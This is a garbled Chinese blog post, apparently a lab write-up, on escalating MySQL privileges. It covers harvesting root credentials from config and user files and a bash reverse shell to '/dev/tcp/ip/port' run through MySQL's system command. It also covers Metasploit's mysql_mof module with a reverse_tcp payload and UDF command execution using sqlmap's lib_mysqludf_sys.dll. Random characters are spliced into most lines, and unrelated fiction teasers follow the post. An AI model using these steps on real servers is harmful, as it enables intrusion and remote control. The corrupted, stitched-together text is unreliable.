Mysql提權(quán)

mysql提權(quán)基礎(chǔ)

?mysql通常在php語言中用的比較多
?連接數(shù)據(jù)庫的文件名一般為conn.php、config.php蓄诽、common.inc.php、config.inc.php等
?mysql的提權(quán)一般需要root用戶

密碼的獲取

?1鹏溯、數(shù)據(jù)庫查詢
??select Host,user,password from mysql.user (查詢?cè)摫硇枰猺oot權(quán)限)

?2系冗、配置文件讀取
??類似未刪除的備份文件、git等開源平臺(tái)绢记、一些打包的壓縮文件造成的源碼或者配置文件泄露

?3扁达、下載user文件
??在mysql的data目錄下,user.frm蠢熄、user.MYD跪解、user.MYT可能存在有密碼的信息

select @@basedir ?獲取當(dāng)前數(shù)據(jù)庫的地址
select @@plugin_dir ?插件目錄,mysql版本>5.1才有插件目錄

提權(quán)

?簡單粗暴的system反彈shell
??mysql中root用戶可以用system + 命令來執(zhí)行系統(tǒng)命令
??system whoami; 執(zhí)行whoami命令

??反彈shell:
??攻擊機(jī)監(jiān)聽:nc -lvvp 7777?(在7777端口監(jiān)聽)



??靶機(jī):id=1;system bash -i >& /dev/tcp/ip/port 0>&1



??此時(shí)攻擊機(jī)反彈shell签孔,可以執(zhí)行命令

?嘗試失敗的mof提權(quán)
??在windows的 c:/windows/system32/wbem/mof/ 目錄下叉讥,里面的mof文件每個(gè)一段時(shí)間便會(huì)執(zhí)行一次
??當(dāng)我們知道了mysql的賬號(hào)密碼并且可以連接后窘行,可以嘗試用msf的攻擊模塊提權(quán)

??msfconsole下:
???use exploit/windows/mysql/mysql_mof
???set rhost xxx.xxx.xxx.xxx ?(目標(biāo)IP)
???set rport 3306?(遠(yuǎn)程連接數(shù)據(jù)庫的端口)
???set username root ?(遠(yuǎn)程連接的數(shù)據(jù)庫賬戶)
???set password 123456 ?(遠(yuǎn)程連接的密碼)
???set lhost xxx.xxx.xxx.xxx (反彈shell的地址)
???set lport 7777 ?(反彈shell的端口)
???set payload windows/shell_reverse_tcp (設(shè)置攻擊載荷)

???exploit 開始攻擊


???提示上傳成功了但是沒有會(huì)話,不知道為什么图仓,正常結(jié)果的話等待一段時(shí)間會(huì)反彈shell回來

???然后我在攻擊機(jī)上執(zhí)行nc -lvvp 6666監(jiān)聽
???去靶機(jī)點(diǎn)擊執(zhí)行msf上傳到c:/windows/system32的exe文件



???然后反彈shell了罐盔,懷疑mof里面的文件根本沒有自動(dòng)執(zhí)行


?老生常談udf提權(quán)
??UDF(user defined function),用戶自定義函數(shù)透绩,可以用于自定義函數(shù)來執(zhí)行命令翘骂。需要mysql安裝udf

??mysql版本大于5.1壁熄,使用select @@plugin_dir語句查看插件安裝的目錄



??mysql版本小于5.1帚豪,windows 2000下放置在c:/winnt/system32目錄,否則就放在c:/windows/system32的目錄下

??udf.dll文件在哪里找呢草丧,在sqlmap下就有
??在sqlmap的目錄下 ./udf/mysql/中就能找到狸臣,我的靶機(jī)版本是32位的


??高版本的sqlmap會(huì)將該文件加密將文件移動(dòng)到./extra/cloak/中,使用cloak.py解碼
??python2 cloak.py -d -i lib_mysqludf_sys.dll_
??解碼完成后就有dll文件了昌执,復(fù)制到插件目錄


??復(fù)制完成后執(zhí)行create function sys_eval returns string soname "lib_mysqludf_sys.dll"烛亦,創(chuàng)建里面的函數(shù),注意這里不用輸入dll的絕對(duì)路徑
??

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末懂拾,一起剝皮案震驚了整個(gè)濱河市煤禽,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌岖赋,老刑警劉巖檬果,帶你破解...
    沈念sama閱讀 218,036評(píng)論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異唐断,居然都是意外死亡选脊,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,046評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門脸甘,熙熙樓的掌柜王于貴愁眉苦臉地迎上來恳啥,“玉大人,你說我怎么就攤上這事丹诀《鄣模” “怎么了?”我有些...
    開封第一講書人閱讀 164,411評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵铆遭,是天一觀的道長硝桩。 經(jīng)常有香客問我,道長疚脐,這世上最難降的妖魔是什么亿柑? 我笑而不...
    開封第一講書人閱讀 58,622評(píng)論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮棍弄,結(jié)果婚禮上望薄,老公的妹妹穿的比我還像新娘疟游。我一直安慰自己,他們只是感情好痕支,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,661評(píng)論 6 392
  • 文/花漫 我一把揭開白布颁虐。 她就那樣靜靜地躺著,像睡著了一般卧须。 火紅的嫁衣襯著肌膚如雪另绩。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,521評(píng)論 1 304
  • 那天花嘶,我揣著相機(jī)與錄音笋籽,去河邊找鬼。 笑死椭员,一個(gè)胖子當(dāng)著我的面吹牛车海,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播隘击,決...
    沈念sama閱讀 40,288評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼侍芝,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了埋同?” 一聲冷哼從身側(cè)響起州叠,我...
    開封第一講書人閱讀 39,200評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎凶赁,沒想到半個(gè)月后咧栗,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,644評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡哟冬,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,837評(píng)論 3 336
  • 正文 我和宋清朗相戀三年楼熄,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片浩峡。...
    茶點(diǎn)故事閱讀 39,953評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡可岂,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出翰灾,到底是詐尸還是另有隱情缕粹,我是刑警寧澤,帶...
    沈念sama閱讀 35,673評(píng)論 5 346
  • 正文 年R本政府宣布纸淮,位于F島的核電站平斩,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏咽块。R本人自食惡果不足惜绘面,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,281評(píng)論 3 329
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧揭璃,春花似錦晚凿、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,889評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至情组,卻和暖如春燥筷,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背院崇。 一陣腳步聲響...
    開封第一講書人閱讀 33,011評(píng)論 1 269
  • 我被黑心中介騙來泰國打工肆氓, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人亚脆。 一個(gè)月前我還...
    沈念sama閱讀 48,119評(píng)論 3 370
  • 正文 我出身青樓做院,卻偏偏與公主長得像盲泛,于是被迫代替她去往敵國和親濒持。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,901評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容

  • 最近在測試一個(gè)項(xiàng)目寺滚,遇到了MYSQL數(shù)據(jù)庫柑营,想盡辦法提權(quán),最終都沒有成功村视,很是郁悶官套,可能是自己很久沒有研究過提權(quán)導(dǎo)...
    CanMeng閱讀 644評(píng)論 0 2
  • Mysql 安裝 以 Centos 7 為例 wget下載安裝包 wget http://repo.mysql.c...
    雞翅兒閱讀 1,165評(píng)論 0 0
  • 0x01 UDF UDF(user defined function)用戶自定義函數(shù),是mysql的一個(gè)拓展接口蚁孔。...
    Pino_HD閱讀 17,389評(píng)論 0 3
  • 沒想到奶赔,英語流利閱讀已經(jīng)堅(jiān)持了25天 天天以朋友圈打卡的方式,還真的挺激勵(lì)人的哈哈 還有一個(gè)最主要的原因呢想杠氢,是因...
    子言偲偲閱讀 284評(píng)論 2 1
  • 姓名:王康軍 公司:常州新日催化劑有限公司 【日精進(jìn)打卡第202天】 【知-學(xué)習(xí)】 閱讀陽明心學(xué)與稻盛哲學(xué) (齊家...
    wangkj閱讀 141評(píng)論 0 0